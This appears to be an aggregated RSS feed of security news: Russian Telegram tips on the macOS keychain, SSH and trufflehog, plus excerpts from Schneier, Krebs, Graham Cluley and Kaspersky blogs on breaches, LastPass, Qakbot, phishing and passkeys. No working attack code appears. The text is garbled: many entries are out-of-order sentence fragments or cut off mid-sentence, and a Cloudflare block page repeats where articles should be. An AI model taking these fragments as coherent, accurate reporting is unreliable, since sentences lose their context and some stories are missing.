Пятничный подгон — как быстро и безопасно управлять переменными окружения на macOS с помощью keychain. По сути там уже все есть, нужно только добавить обертку.Делаем раз:tee ~/keychain-env.sh <<'EOF'function keychain-env-read () { security find-generic-password -w -a ${USER} -D "environment variable" -s "${1}"}function keychain-env-add () { [ -n "$1" ] || print "Missing environment variable name" read -s "?Enter Value for ${1}: " secret ( [ -n "$1" ] && [ -n "$secret" ] ) || return 1 security add-generic-password -U -a ${USER} -D "environment variable" -s "${1}" -w "${secret}"}EOFДва:echo -n 'source ~/keychain-env.sh' >> ~/.zshrcТри:source ~/.zshrcТеперь взмахом руки можно добавлять перемен…

Все уже успели перевели свои Google-аккаунты на Passkey?С сегодняшнего дня это официальный способ аутентификации для Google и огромный шаг к будущему без паролей 🔐включать тут > https://myaccount.google.com/signinoptions/passkeysBlog > https://blog.google/technology/safety-security/the-beginning-of-the-end-of-the-password/

🐐 Kubernetes Goat — наверное самый популярный проект для изучения безопасности Kubernetes.Круто, что благодаря сообществу они продолжают развивать и добавлять новые сценарии. Например недавно добавили лабы для изучения Cilium Tetragon и Kyverno.Большинство сценариев простые, зато их уже более 20 штук, поэтому для общего понимания очень даже.> https://madhuakula.com/kubernetes-goat/> https://github.com/madhuakula/kubernetes-goat

Неплохие площадки для экспериментов с docker и kubernetes, если лень разворачивать лабы и разбираться с админской частью.https://labs.play-with-docker.com/https://labs.play-with-k8s.com/Есть и песочницы и отдельные таски, где можно подтянуть темы, которые вы давно откладывали, например как работают linux capabilities или seccomp профили

Говорят, чтобы пойти работать джун аппсеком достаточно научиться разворачивать какую-нибудь oauth proxy перед своими критическими сервисами.Согласны? Узнали? Какая ваша любимая? 🫠

Советую как будет время глянуть вчерашний ИБ-митап Яндекса, достаточно интересные и разные темы. Cразу спойлер — про слив упомянули, но ничего не рассказали, обещали потом.А вообще парням большой респект за то, что несмотря на то, что происходит в мире российского ИБ, они просто рассказывают важные и интересные вещи о том, как можно и нужно делать ИБ, без какого-либо продающего контекста (ну если только чуть-чуть). Ну и в опенсорс коммитят конечно же 🙂Все доклады классные, просто бери обводи и обновляй свои ИБ планы на 2023-2024 года.00:04:13 Про DevSecOps в Яндекс.Облаке, немного продающий облако, но затрагивающий лучшие практики о том, как построить процессы ИБ в финтехе и не только.01:10…

А вы знали, что OpenSSH на macOS позволяет пасс-фразы от ваших ssh-ключей добавить в keychain, чтобы автоматом подтягивать их при подключении?Делаем:ssh-add --apple-use-keychain ~/.ssh/[priv-key]И подключаем в конфиге агента ~/.ssh/config:Host * UseKeychain yes AddKeysToAgent yes IdentityFile ~/.ssh/id_rsaГотово, вы сэкономили немного своего времени на ввод passphrase.Если ключей несколько, то агент по имени ключа будет доставать нужную фразу.P.S На старых версиях MacOS команда чуть отличается, вот тут подглядите.Ну а теперь похоливарим за безопасность такого метода, особенно если у вас включен iCloud sync? 🤪

Понял тут, что не рассказывал о trufflehog, наверное лучшем на сегодншний день решении для поиска секретов. SSH и API ключи, пароли к бд, токены, облачные учетные данные и многое другое. Там уже 700 детекторов/регулярок, причем для некоторых есть сразу автоматическая проверка. Нашли например креды к AWS или GCP, нажали кнопочку и trufflehog любезно постучал в нужную апишку для валидации.Еще помимо привычных множественных сканов репозиториев, есть возможность поиска по файловой системе и даже s3 бакетам. Бонусом можно скачать плагин для браузера чтобы и по JS пройтись.Короче, мастхев для безопасности ваших пайплайнов и обнаружения секретов, которые кто-то случайно забыл положить куда следует…

Пссс, завезем немного движа в ИБ?Давно вынашивал идею закрытого сообщества для безопасников, где можно было бы черпать экспертизу, обмениваться опытом, получать актуальную информацию и просто общаться с крутыми и интересными людьми.Почему закрытого? Потому что сами знаете специфику нашего направления, когда далеко не все готовы обсуждать многие вещи публично. Но согласитесь, у многих есть опыт, которым можно поделиться и который может быть очень полезен. Мне кажется закрытый формат может хотя бы частично эту проблему решить.В общем, не буду ходить вокруг да около, сейчас я на этапе проверки гипотезы поэтому очень хочется получить от вас обратную связь.Основную идею постарался изложить тут >…

Я снова пропал, но тут такая новость сегодня, что нельзя было не поделиться — поддержка Passkeys теперь официально доехала до Google Chrome (Chrome Stable M108 если быть точным).На всякий случай Passkeys — это инициатива альянсов FIDO и W3C по разработке стандарта аутентификации без использования паролей, которые являются занозой в заднице в современном мире: утечки, брутфорс, сменяемость, желание написать его на листочке и приклеить к монитору и пр.Короче крутые чуваки собрались как-то, подумали и изобрели WebAuthn. Потом инициативу поддержали Apple, Google и Microsoft, обернули это в Passkeys и вот он, продукт который можно внедрять и нести людям (многие уже давно принесли даже, только Go…

An ancient squid:New research on fossils has revealed that a vampire-like ancient squid haunted Earth’s oceans 165 million years ago.

The study, published in June edition of the journal Papers in Palaeontology, says the creature had a bullet-shaped body with luminous organs, eight arms and sucker attachments.

The discovery was made by scientists in France, who used modern imaging technique to analyse the previously discovered fossils.

The ancient squid has been named Vampyrofugiens atramentum, which stands for the “fleeing vampire”.

The researchers said that these features have never been recorded before.

New Revelations from the Snowden DocumentsJake Appelbaum’s PhD thesis contains several new revelations from the classified NSA documents provided to journalists by Edward Snowden.

At this point, those documents are more historical than anything else.

And it’s unclear who has those archives anymore.

I recently published an essay about my experiences ten years ago.

Posted on September 21, 2023 at 7:03 AM • 1 Comments

In April, Cybersecurity Ventures reported on extreme cybersecurity job shortage:Global cybersecurity job vacancies grew by 350 percent, from one million openings in 2013 to 3.5 million in 2021, according to Cybersecurity Ventures .

What there is a shortage of are computer scientists, developers, engineers, and information security professionals who can code, understand technical security architecture, product security and application security specialists, analysts with threat hunting and incident response skills.

[…]Most entry-level roles tend to be quite specific, focused on one part of the profession, and are not generalist roles.

In fact, security roles are often not considered entry-lev…

Detecting AI-Generated TextThere are no reliable ways to distinguish text written by a human from text written by an large language model.

OpenAI writes:Do AI detectors work?

While some (including OpenAI) have released tools that purport to detect AI-generated content, none of these have proven to reliably distinguish between AI-generated and human-generated content.

When we at OpenAI tried to train an AI-generated content detector, we found that it labeled human-written text like Shakespeare and the Declaration of Independence as AI-generated.

Even if these tools could accurately identify AI-generated content (which they cannot yet), students can make small edits to evade detection.

Using Hacked LastPass Keys to Steal CryptocurrencyRemember last November, when hackers broke into the network for LastPass—a password database—and stole password vaults with both encrypted and plaintext data for over 25 million users?

Well, they’re now using that data break into crypto wallets and drain them: $35 million and counting, all going into a single wallet.

Look, I know that online password databases are more convenient.

This is why my Password Safe is local only.

(I know this sounds like a commercial, but Password Safe is not a commercial product.)

Friday Squid Blogging: Cleaning SquidTwo links on how to properly clean squid.

I learned a few years ago, in Spain, and got pretty good at it.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Posted on September 15, 2023 at 5:08 PM • 0 Comments

Claude’s reply:Here’s a brief summary of the key themes and arguments made in security expert Bruce Schneier’s book Beyond Fear: Thinking Sensibly About Security in an Uncertain World:Central Themes:Effective security requires realistic risk assessment, not fear-driven responses.

Security trade-offs need to be carefully balanced against costs to other values like privacy, freedom, and social/economic impacts.

Schneier argues for rational, ethical approaches to security aimed at genuine protection while avoiding violations of human rights in the name of safety.

Here are some of the key ethical arguments Bruce Schneier makes in Beyond Fear regarding security policy and practices:Utilitarian E…

Interesting article on technologies that will automatically identify people:With technology like that on Mr. Leyvand’s head, Facebook could prevent users from ever forgetting a colleague’s name, give a reminder at a cocktail party that an acquaintance had kids to ask about or help find someone at a crowded conference.

However, six years later, the company now known as Meta has not released a version of that product and Mr. Leyvand has departed for Apple to work on its Vision Pro augmented reality glasses.

Upcoming Speaking EngagementsThis is a current list of where and when I am scheduled to speak:I’m speaking at swampUP 2023 in San Jose, California, on September 13, 2023 at 11:35 AM PT.

The list is maintained on this page.

Posted on September 14, 2023 at 12:01 PM • 0 Comments

Google removed fake Signal and Telegram apps from its Play store.

An app with the name Signal Plus Messenger was available on Play for nine months and had been downloaded from Play roughly 100 times before Google took it down last April after being tipped off by security firm ESET.

An app calling itself FlyGram, meanwhile, was created by the same threat actor and was available through the same three channels.

Both apps were built on open source code available from Signal and Telegram.

Signal Plus could monitor sent and received messages and contacts if people connected their infected device to their legitimate Signal number, as is normal when someone first installs Signal on their device.

Make sure you update your iPhones:Citizen Lab says two zero-days fixed by Apple today in emergency security updates were actively abused as part of a zero-click exploit chain (dubbed BLASTPASS) to deploy NSO Group’s Pegasus commercial spyware onto fully patched iPhones.

The two bugs, tracked as CVE-2023-41064 and CVE-2023-41061, allowed the attackers to infect a fully-patched iPhone running iOS 16.6 and belonging to a Washington DC-based civil society organization via PassKit attachments containing malicious images.

“We refer to the exploit chain as BLASTPASS.

The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the vict…

Cars Have Terrible Data PrivacyA new Mozilla Foundation report concludes that cars, all of them, have terrible data privacy.

All 25 car brands we researched earned our *Privacy Not Included warning label—making cars the official worst category of products for privacy that we have ever reviewed.

There’s a lot of details in the report.

They’re all bad.

Posted on September 12, 2023 at 7:20 AM • 1 Comments

On Robots Killing PeopleThe robot revolution began long ago, and so did the killing.

The 1905 Grover Shoe Factory disaster led to regulations governing the safe operation of steam boilers.

At the time, companies claimed that large steam-automation machines were too complex to rush safety regulations.

OpenAI, for example, has reportedly fought to “water down” safety regulations and reduce AI-quality requirements.

True technological progress comes from applying comprehensive safety standards across technologies, even in the realm of the most futuristic and captivating robotic visions.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

By combining these capabilities, though, a tool-using AI could do it all.

But a tool-using LLM could dissect its own internals, offering empirical assessments of its own reasoning and deterministic explanations of why it produced the answer it did.

Over time, tool-using AIs might start to look a lot like tool-using humans.

We must also prepare for the benign ways that tool-using AI might impact society.

We should reshape how we interact with our governments to take advantage of AI tools that give us all dramatically more potential to have our voices heard.

The password manager service LastPass is now forcing some of its users to pick longer master passwords.

LastPass told customers this week they would be forced to update their master password if it was less than 12 characters.

Nor was he ever forced to improve his master password.

To automatically populate the appropriate credentials at any website going forward, you simply authenticate to LastPass using your master password.

A chart on Palant’s blog post offers an idea of how increasing password iterations dramatically increases the costs and time needed by the attackers to crack someone’s master password.

8Base maintains a darknet website that is only reachable via Tor, a freely available global anonymity network.

The 8Base darknet site also has a built-in chat feature, presumably so that 8Base victims can communicate and negotiate with their extortionists.

Admin Login to 8Base dashboard.”Right-clicking on the 8Base admin page and selecting “View Source” produces the page’s HTML code.

Mr. Kolev’s LinkedIn page says he’s a full-stack developer at JCube Group, and that he’s currently looking for work.

The tip about the leaky 8Base website was provided by a reader who asked to remain anonymous.

The FBI responded by reverifying all InfraGard members and by seizing the cybercrime forum where the data was being sold.

But on Sept. 11, 2023, USDoD resurfaced after a lengthy absence to leak sensitive employee data stolen from the aerospace giant Airbus, while promising to visit the same treatment on top U.S. defense contractors.

In a post on the English language cybercrime forum BreachForums, USDoD leaked information on roughly 3,200 Airbus vendors, including names, addresses, phone numbers, and email addresses.

USDoD claimed they grabbed the data by using passwords stolen from a Turkish airline employee who had third-party access to Airbus’ systems.

In March 2023, the FBI arrested and …

Also, Adobe, Google Chrome and Apple iOS users may have their own zero-day patching to do.

Apple says the iOS flaw (CVE-2023-41064) does not seem to work against devices that have its ultra-paranoid “Lockdown Mode” enabled.

On the Microsoft front, a zero-day in Microsoft Word is among the more concerning bugs fixed today.

Finally, Adobe has released critical security updates for its Adobe Reader and Acrobat software that also fixes a zero-day vulnerability (CVE-2023-26369).

For a more granular breakdown of the Windows updates pushed out today, check out Microsoft Patch Tuesday by Morphus Labs.

To automatically populate the appropriate credentials at any website going forward, you simply authenticate to LastPass using your master password.

Connor chose to protect his LastPass password vault with an eight character master password that included numbers and symbols (~50 bits of entropy).

WHAT SHOULD LASTPASS USERS DO?

Weaver said that Secret Key adds an extra level of randomness to all user master passwords that LastPass didn’t have.

“With LastPass, the idea is the user’s password vault is encrypted with a cryptographic hash (H) of the user’s passphrase,” Weaver said.

This is noteworthy because .US is overseen by the U.S. government, which is frequently the target of phishing domains ending in .US.

But few other major countries in the world have anywhere near as many phishing domains each year as .US.

Interisle’s newest study examined six million phishing reports between May 1, 2022 and April 30, 2023, and found 30,000 .US phishing domains.

“The .US ‘nexus’ requirement theoretically limits registrations to parties with a national connection, but .US had very high numbers of phishing domains,” Interisle wrote.

“Ironically, at least 109 of the .US domains in our data were used to attack the United States government, specifically the United States Postal Se…

The international law enforcement operation involved seizing control over the botnet’s online infrastructure, and quietly removing the Qakbot malware from tens of thousands of infected Microsoft Windows computers.

From there, investigators obtained court-ordered approval to instruct all infected systems to uninstall Qakbot and to disconnect infected machines from the botnet, Alway said.

Researchers at AT&T Alien Labs say the crooks responsible for maintaining the QakBot botnet have rented their creation to various cybercrime groups over the years.

“The Qakbot Uninstall file did not remediate other malware that was already installed on infected computers,” the government explained.

Further r…

Cryptocurrency lender BlockFi and the now-collapsed crypto trading platform FTX each disclosed data breaches this week thanks to a recent SIM-swapping attack targeting an employee of Kroll — the company handling both firms’ bankruptcy restructuring.

This means that stealing someone’s phone number often can let cybercriminals hijack the target’s entire digital life in short order — including access to any financial, email and social media accounts tied to that phone number.

The average cost to SIM swap any T-Mobile phone number was approximately $1,500.

The SIM-swapping attack against Kroll is a timely reminder that you should do whatever you can to minimize your reliance on mobile phone com…

But at a very important level, it doesn’t matter how or why the attackers got that initial foothold on your network.

“Imagine doing that, but for file reads, database queries, process executions or patterns in log files,” the Canary Tokens documentation explains.

Importantly, the canary tokens themselves are useless to an attacker.

For example, that AWS canary token sure looks like the digital keys to your cloud, but the token itself offers no access.

One nice thing about canary tokens is that Thinkst gives them away for free.

You’ve probably never heard of “16Shop,” but there’s a good chance someone using it has tried to phish you.

16Shop also localized phishing pages in multiple languages, and the service would display relevant phishing content depending on the victim’s geolocation.

“Depending on location, 16Shop will also collect ID numbers (including Civil ID, National ID, and Citizen ID), passport numbers, social insurance numbers, sort codes, and credit limits,” McAfee wrote.

In addition, 16Shop employed various tricks to help its users’ phishing pages stay off the radar of security firms, including a local “blacklist” of Internet addresses tied to security companies, and a feature that allowed users to blo…

]co.uk, a scam due diligence company that Equity-Invest insists all investment partners use.

John Clifton Davies was convicted in 2015 of swindling businesses throughout the U.K. that were struggling financially and seeking to restructure their debt.

The broker’s suspicions were confirmed after he discovered the due diligence company that Equity-Invest insisted on using — Diligere[.

Although Diligere’s website claims the due diligence firm has “13 years of experiance” [sic], its domain name was only registered in April 2023.

]ch — the fake due diligence firm secretly owned for many years by The Private Office of John Bernard (John Clifton Davies).

Microsoft Corp. today issued software updates to plug more than 70 security holes in its Windows operating systems and related products, including multiple zero-day vulnerabilities currently being exploited in the wild.

Last month, Microsoft acknowledged a series of zero-day vulnerabilities in a variety of Microsoft products that were discovered and exploited in-the-wild attacks.

Satnam Narang, senior staff research engineer at Tenable, said the August patch batch addresses CVE-2023-36884, which involves bypassing the Windows Search Security feature.

Separately, Adobe has issued a critical security update for Acrobat and Reader that resolves at least 30 security vulnerabilities in those pro…

“Introducing my newest creation, ‘WormGPT,’ wrote “Last,” the handle chosen by the HackForums user who is selling the service.

AN OPEN BOOKReached via Instagram and Telegram, Morais said he was happy to chat about WormGPT.

“Anyone that tests wormgpt can see that it has no difference from any other uncensored AI or even chatgpt with jailbreaks,” Morais explained.

Asked to list some of the legitimate or what he called “white hat” uses for WormGPT, Morais said his service offers reliable code, unlimited characters, and accurate, quick answers.

“We used WormGPT to fix some issues on our website related to possible sql problems and exploits,” he explained.

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days.

The reader, who asked to remain anonymous, said the phishing message contained an attachment that appeared to have a file extension of “.pdf,” but something about it seemed off.

The file included in this phishing scam uses what’s known as a “right-to-left override” or RLO character.

“The email came through Microsoft Office 365 with all the detections turned on and was not caught,” the reader continued.

Clicking on the “Restore Messages” link there bounces you through an open redirect on LinkedIn before forwarding to the phishing w…

Researchers say mobile malware purveyors have been abusing a bug in the Google Android platform that lets them sneak malicious code into mobile apps and evade security scanning tools.

At issue is a mobile malware obfuscation method identified by researchers at ThreatFabric, a security firm based in Amsterdam.

The company has since attributed this increase to a semi-automated malware-as-a-service offering in the cybercrime underground that will obfuscate or “crypt” malicious mobile apps for a fee.

According to ThreatFabric, there are a few telltale signs that app analyzers can look for that may indicate a malicious app is abusing the weakness to masquerade as benign.

“The company has never e…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Donald Trump Jr may not have just inherited his famous father’s name.

The media is reporting that Donald J Trump Jr’s Twitter account (I refuse to call it “X”, as that’s an even dafter name that “Elon Musk’s Fun Palace”) posted a message claiming that his father, ex-president Donald J Trump, had died.

The tweet, which has since been deleted, read:“I’m sad to announce, my father Donald Trump has passed away.

Was Donald J Trump Jr’s Twitter account protected with a strong, unique password?

We do, however, know that the Trump dynasty has a history of choosing very poor passwords for its Twitter accounts.

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Host Unknown’s Andrew Agnês.

As a listener to Smashing Security you can save 10% off Drata and have implementation fees waived.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive con…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Every quarter, the Expel security operations centre (SOC) publishes its Quarterly Threat Report (QTR) to distill all the trends, notable new behaviours, and unusual attacks it saw in the previous quarter.

By sharing how attackers got in, and how Expel stopped them, the QTR helps inform your organisation’s security strategy.

Download your copy of the Expel QTR for an in-depth look at what Expel analysts saw this quarter, including:56% of all incidents were account compromise or account takeover in Microsoft 365.

23% of incidents involved the deployment of commodity malware and malware families linked to pre-ransomware operations.

You’ll get more information about these threats and patterns, …

Well, the YouPorn logo and nicely-formatted message certainly makes it look like it has come from the porn video site.

And, uh-oh, it seems YouPorn’s AI algorithm has detected me in a sex video that has been uploaded!

But how clever of YouPorn’s AI system to detect that it was me in the video, and then get in touch to warn me.

It makes me wonder what kind of AI technology they’re using here.

I’m just going to have to assume that YouPorn has got a sex video of me, as I can’t double-check for myself.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Uh-oh, yet another UK police force has suffered a serious data breach.

After the incidents involving Cumbria Police, Norfolk and Suffolk Police, and – perhaps worst of all – the PSNI in Northern Ireland, it’s now Greater Manchester Police finding itself in the hot seat.

It’s also necessary to ensure that any suppliers or partners who you grant access to your data are similarly well protected.

Greater Manchester Police says it has informed the Information Commissioner’s Office (ICO) about the incident.

In total four arrests have so far been made in Northern Ireland related to the data breach, with one man charged with having articles for use in terrorism.

Getting high-quality, actionable pentesting reports doesn’t have to take hours.

Conquer time-consuming processes, reduce potential for errors and inconsistencies, and mitigate collaboration difficulties with reporting automation.

PlexTrac is the premier penetration test reporting, collaboration and management platform designed to streamline the complete pentesting life cycle.

From staging offensive engagements and conducting assessments to analyzing data and delivering findings, PlexTrac enables you to deliver high-quality pentest reports and actionable insights — quicker than you ever thought possible.

PlexTrac takes the pain out of pentest documentation so your team can spend more time ha…

It seems modern cars are gobbling up all kinds of data about their drivers including – astonishingly – details of their sex lives.

It’s that or we simply don’t bother to read privacy policies.

Mozilla’s great Privacy Not Included project has done a great job of uncovering just how much of a privacy nightmare modern cars are.

Having read Mozilla’s report, it’s no wonder it describe cars as the worst product category it has ever reviewed for privacy.

Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive content we post.

Deepfakes are being used for good (perhaps), common usernames could pose a security threat, and someone has paid a $500,000 fee… just to send $1,865.

Hosts:Graham Cluley – @gcluleyCarole Theriault – @caroletheriaultGuest:Dave BittnerEpisode links:Sponsored by:Kolide – Kolide ensures that if your device isn’t secure it can’t access your cloud apps.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter or …

State-sponsored hackers, backed by the regime in North Korea, are believed to be using zero-day exploits to target cybersecurity researchers working in the field of vulnerability research and development. Read more in my article on the Hot for Security blog.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Mark Stockley.

Not without runtime insights!

Learn how runtime insights reduces fatigue so developers can focus on delivering software and your security teams can focus on other demands.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Фальшивые приложения в магазинахСейчас практически каждый серьезный бизнес имеет собственное приложение для удобного доступа клиентов к услугам или для заказа товаров.

Фейковые аккаунты в социальных сетяхУчетные записи в социальных сетях, якобы имеющие отношение к вашей компании, могут использоваться злоумышленниками во множестве различных схем.

Однако фейковый аккаунт также может распространять вредоносные или фишинговые ссылки, а также служить площадкой для более сложных атак, связанных с применением социальной инженерии.

В подавляющем большинстве случаев цель разнообразных незаконных схем, связанных с имитацией вашего сайта, — третья сторона (будь то физические лица или сторонние компани…

В этом посте разбираемся, что этот самый Fediverse собой представляет, как он работает, что он предлагает пользователям уже сейчас и что в нем может появиться в недалеком будущем.

Теория: что такое Fediverse и как это работаетFediverse (от английских слов federation и universe, то есть «федерация» и «вселенная») — это объединение независимых социальных сетей, дающее возможность пользователям взаимодействовать друг с другом примерно так же, как это обычно происходит в рамках какой-то одной платформы.

В свою очередь, каждая из участвующих в Fediverse платформ федеративная сама по себе и состоит из сообщества независимых серверов (их в Fediverse принято называть сущностями (instances)).

Опять …

Поэтому, когда внезапно в почтовые ящики падает приглашение на внеочередной опрос для самооценки, многие не раздумывая спешат ответить на вопросы.

И в теории ваш HR-отдел действительно мог воспользоваться услугами неизвестного вам подрядчика.

Даже если вы не знаете, что это некоммерческая организация, цель которой в помощи семьям, заботящимся о пожилых родственниках, название должно насторожить.

Кроме того, в письме написано, что опрос ОБЯЗАТЕЛЕН для ВСЕХ (капслоком) и сдать его нужно До Конца Дня (с заглавных букв).

Дело в том, что в анкете требуется указать адрес электронной почты, аутентифицироваться при помощи своего пароля и дополнительно ввести пароль еще раз для подтверждения.

По результатам недавнего опроса, каждый пятый CISO работает 65 часов в неделю, а не 38 или 40, как написано в контракте.

E-mail с подозрениями сотрудниковЧтобы закончить с темой e-mail, отметим еще одну категорию «шумных» писем.

Если пункт 2 неосуществим, сосредоточьте усилия на автоматическом поиске заведомо безопасных писем среди присланных на e-mail для подозрений.

Поддерживайте откровенный диалог с основными бизнес-заказчиками по поводу того, как меры ИБ влияют на их процессы и эффективность.

Сложность материала и в обучении, и в тестах будет автоматически адаптироваться к уровню сотрудника, а геймификация повысит процент тех, кто прошел курс охотно и полностью.

Также для каждого созвона потребуется своя группа, что удобно для регулярных встреч одним и тем же составом, но не подходит для многочисленных разнородных конференций.

Управление настройками в Element немного сложнее, но и инструментов больше: видимость чатов, уровни доступа участников и так далее.

Для «просто звонков» стоит вернуться к Jitsi, тем более что Element использует код Jitsi для этой функции.

Zoom: шифрование для богатыхМало кто знает, что сквозное шифрование предусмотрено и в Zoom, доминирующем на рынке решении для видеоконференций.

Активировать шифрование в Zoom можно и для маленьких встреч, но лицензия для больших конференций все равно потребуется.

Контейнеры прекрасно вписались в современную методологию непрерывной интеграции и развертывания (CI/CD, continuous integration, continuous delivery), помогающую выпускать обновления приложений быстрее и с меньшим числом ошибок.

Если грамотно внедрить требования контейнерной безопасности в процесс разработки и сборки, то это существенно продвинет организацию на пути к полноценной реализации методологии DevSecOps.

Основные угрозы в контейнерной инфраструктуреИ хост-система, и среды контейнеризации, и приложения в контейнерах подвержены большинству типичных рисков ИБ, таких как уязвимости в компонентах, небезопасные настройки и так далее.

Образы контейнеров, не прошедшие проверку, либо просто …

Получается, что программа, построенная на фреймворке Electron, — это как бы один-единственный сайт, открытый в браузере Chromium.

В чем проблема приложений на ElectronУ приложений, построенных на фреймворке Electron, есть несколько недостатков.

Здесь уместно еще раз повторить: внутри каждого приложения, разработанного на Electron, содержится отдельный веб-браузер Chromium.

Какие настольные приложения построены на фреймворке ElectronНемногие об этом подозревают, но десктопные приложения, основанные на фреймворке Electron, невероятно распространены.

Разумеется, список выше — это далеко не все приложения, построенные на фреймворке Electron, в него входят только наиболее популярные из них.

Недавно такой сервис вышел из стен Kaspersky Product Studio, и называется он SubsCrab.

SubsCrab поможет организовать все ваши подпискиПри помощи приложения SubsCrab очень легко вести список подписок, не забывать об оплатах и находить наиболее выгодные предложения, промокоды и скидки.

Когда все подписки занесены в SubsCrab, приложение начинает напоминать о предстоящих платежах, показывать общие траты на подписки в выбранный месяц и год — в общем, помогать с планированием бюджета.

Мы понимаем, что это немного забавно звучит, но и сам SubsCrab — подписной сервис.

Платная версия SubsCrab умеет находить подписки в почте автоматически, вести и анализировать несколько списков подписок — для разных…

В предыдущих постах «школьной серии» мы обсудили, как защитить устройства, которыми пользуется ваш школьник, и как объяснить ему важность кибербезопасности в школе.

По мнению прокурора, через этот бесплатный сервис для школ компания Google собирает персональные данные школьников и использует их для своих коммерческих целей.

Но мне, как отцу троих детей, довелось наблюдать и другие электронные дневники, про которые вообще неизвестно, как там хранятся персональные данные и куда они передаются.

При этом и Zoom, и Teams, и другие программы для видеоконференций содержат уязвимости и подвергаются атакам.

Ну и, разумеется, на всех устройствах, используемых вашими детьми для обучения, необходимо ус…

Наши эксперты обнаружили в Google Play несколько зараженных приложений, притворявшихся версиями Telegram на уйгурском, упрощенном китайском и традиционном китайском языках.

Описания приложений выполнены на соответствующих языках и дополнены картинками, очень похожими на те, что размещены на странице официального приложения Telegram в Google Play.

В предыдущих сериях: шпионские версии Telegram и Signal в Google PlayИнтересно, что некоторое время назад исследователями ESET была обнаружена еще одна шпионская версия «телеги» под названием FlyGram.

Вместо этого он представлялся альтернативным клиентом Telegram, то есть как раз модом, и размещался не только в Google Play, но и в Samsung Galaxy St…

С чем могут быть связаны такие внезапные изменения системного времени в Windows?

Что такое Secure Time SeedingФункция Secure Time Seeding была добавлена в Windows 10 в 2015 году.

Основной особенностью Secure Time Seeding, по задумке ее создателей, является возможность поправить время в системе, не обращаясь к серверам текущего времени.

Одним из главных подозреваемых тут является часто используемая библиотека OpenSSL (вместо текущего времени сервера она подставляет в отметку времени случайные значения).

Причем такой сбой может произойти и в серверных версиях данной операционной системы — Windows Server 2016, Windows Server 2019 и Windows Server 2022.

Сеть тогда была доступна только по дайл-апу, да и контента — впрочем, как и угроз — в ней было на порядки меньше.

А уж гаджеты и Интернет для подрастающего поколения стали такой же неотъемлемой частью их жизни (а потом и учебы), как для нас электричество.

Но в начале каждого учебного года стоит еще раз напомнить подросшим детям, что их онлайн-общение и действия, совершенные ими онлайн, имеют такие же последствия, как и поступки в реальном мире.

Тем более, что команды «Undo» в Интернете, как и в реальном мире, не существует.

И эти правила, равно как и последствия их неисполнения, стоит сформировать заранее и поддерживать всей семьей: сел за стол — отложи смартфон!

Под «взломом» мы понимаем внесение в сайт изменений, не путайте его с DDoS-атакой.

Впрочем, на практике бывает, что взламывают сайты, и так забытые владельцем, и тогда все эти беды с посещаемостью никого не заботят.

По имеющейся статистике, в Сети опубликовано более 1,1 млрд сайтов, но 82% из них не обновляются и не обслуживаются.

Ну и самый очевидный сигнал — к вам обращаются посторонние люди или организации и жалуются, что на сайте есть вредоносный контент.

Как и в борьбе с насекомыми, тщательно удалить с сайта веб-шелл и прочие лазейки хакеров без опыта трудно.

На крупных инстансах жизнь бурлит и больше контента, но и загруженность их выше.

Но для каждого конкретного поста в Mastodon вы можете настроить особый уровень доступа:для всех;только для подписчиков;только для упомянутых в посте пользователей.

Но есть и общие политики для всей платформы, и, публикуя посты, придется учитывать как правила конкретного инстанса, на котором вы зарегистрированы, так и правила Mastodon в целом.

Хотя Mastodon и напоминает «клуб по интересам», но среди единомышленников могут оказаться и злоумышленники.

Поэтому, как и с другими соцсетями, стоит обеспечить собственную приватность, защиту от фишинга и утечек персональных данных на всех ваших устройствах с помощью Kasp…

И в первую очередь овладеть этими правилами должны, конечно, родители.

Начнем с азов, с «железа» — то есть с безопасности устройств, необходимых (или не очень) современному школьнику.

Во-первых, разработчики торопятся вывести свои новинки на рынок и не тестируют их на уязвимости.

Это значит, что для них, скорее всего, либо нет антивирусов, либо нет доступного интерфейса, чтобы поставить защитное решение.

Однако множество угроз — таких как фальшивые браузерные расширения, скрытые криптомайнеры, фишинг и вредоносные сайты — остаются актуальными и для Chromebook.

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

